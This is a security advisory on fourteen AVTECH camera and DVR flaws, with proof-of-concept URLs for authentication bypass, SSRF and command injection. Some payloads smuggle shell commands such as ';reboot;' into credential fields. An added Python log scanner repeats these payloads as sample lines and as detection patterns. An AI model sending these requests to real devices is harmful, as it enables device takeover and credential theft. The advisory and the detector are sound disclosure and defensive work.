Affected product:
Platform and firmware on any AVTECH-branded device: IP cameras, NVRs and DVRs
Avtech is the second most popular search term on Shodan. According to Shodan, more than 130,000 AVTECH devices are exposed to the internet.
List of vulnerabilities
1) Plaintext storage of administrative password
2) Missing CSRF protection
3) Unauthenticated information disclosure
POC:
GET /cgi-bin/nobody/Machine.cgi?action=get_capability
4) Unauthenticated SSRF in DVR devices
POC:
http://<device_ip>/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==
5) Unauthenticated command injection in DVR devices
POC:
http://<device_ip>/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$(ps|grep%20Search.cgi|grep%20-v%20grep|head%20-n%201|awk%20'{print%20"/tmp/"$1".log"}');&password=admin
6) Authentication bypass #1
7) Authentication bypass #2
POC:
http://<device_ip>/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*
8) Unauthenticated file download from web root
POC:
http://<device_ip>/cgi-bin/cgibox?.cab
9) Login captcha bypass #1
POC:
http://<device_ip>/cgi-bin/nobody/VerifyCode.cgi?account=<b64(username:password)>&login=quick
10) Login captcha bypass #2
11) Authenticated command injection in CloudSetup.cgi
POC:
http://<device_ip>/cgi-bin/supervisor/CloudSetup.cgi?exefile=ps
12) Authenticated command injection in adcommand.cgi
POC:
POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.1
Host: <device_ip>
Content-Length: 23
Cookie: SSID=YWRtaW46YWRtaW4=

DoShellCmd "strCmd=ps&"
13) Authenticated command injection in PwdGrp.cgi
POC:
http://<device_ip>/cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR&lifetime=5%20MIN
14) HTTPS used without certificate verification
Source: http://www.search-lab.hu/
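A defender-side check for the request shapes listed above, as an added example (not part of the original advisory and not AVTECH code): it scans web server or reverse-proxy access logs in common log format and reports which numbered items each request matches. The function names, the matching rules and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, unquote

# Shell metacharacters that should never appear in a credential field.
SHELL_META = re.compile(r"[;|`$<>]")
# Client address and request line of a common/combined-format log entry.
LOG_LINE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"')

def params(query):
    """Split on '&' only, so a ';' inside a value stays part of that value."""
    pairs = (p.partition("=") for p in query.split("&") if p)
    return {unquote(k): unquote(v) for k, _, v in pairs}

def classify(method, url):
    """Return the item numbers from the list above that a request matches."""
    parts = urlsplit(url)
    path, query, q = parts.path.lower(), unquote(parts.query), params(parts.query)
    end = path.endswith
    ssrf = end("/nobody/search.cgi") and q.get("action") == "cgi_query"
    checks = [
        (3, end("/nobody/machine.cgi") and q.get("action") == "get_capability"),
        (4, ssrf),
        (5, ssrf and SHELL_META.search(q.get("username", "") + q.get("password", ""))),
        (7, "/cgi-bin/" in path and "/nobody/" not in path and "/nobody" in query),
        (8, end("/cgi-bin/cgibox") and ".cab" in query),
        (9, end("/nobody/verifycode.cgi") and q.get("login") == "quick"),
        (11, end("/supervisor/cloudsetup.cgi") and "exefile" in q),
        (12, end("/supervisor/adcommand.cgi") and method == "POST"),
        (13, end("/supervisor/pwdgrp.cgi") and SHELL_META.search(q.get("pwd", ""))),
    ]
    return [item for item, matched in checks if matched]

def scan(lines):
    """Return (client_ip, item_numbers, url) for each log line that matches."""
    reqs = (m for m in map(LOG_LINE.match, lines) if m)
    hits = ((m["ip"], classify(m["method"], m["url"]), m["url"]) for m in reqs)
    return [h for h in hits if h[1]]

# Constructed sample entries (documentation addresses), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2017:10:00:00 +0000] "GET /cgi-bin/nobody/Machine.cgi?action=get_capability HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2017:10:00:02 +0000] "GET /cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.* HTTP/1.1" 200 900',
    '198.51.100.7 - - [01/Jan/2017:10:05:00 +0000] "GET /cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR&lifetime=5%20MIN HTTP/1.1" 200 64',
    '203.0.113.5 - - [01/Jan/2017:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, items, url in scan(SAMPLE_LOG):
        print(ip, items, url)
```

Item 12 is flagged on any POST to adcommand.cgi because request bodies are not recorded in standard access logs.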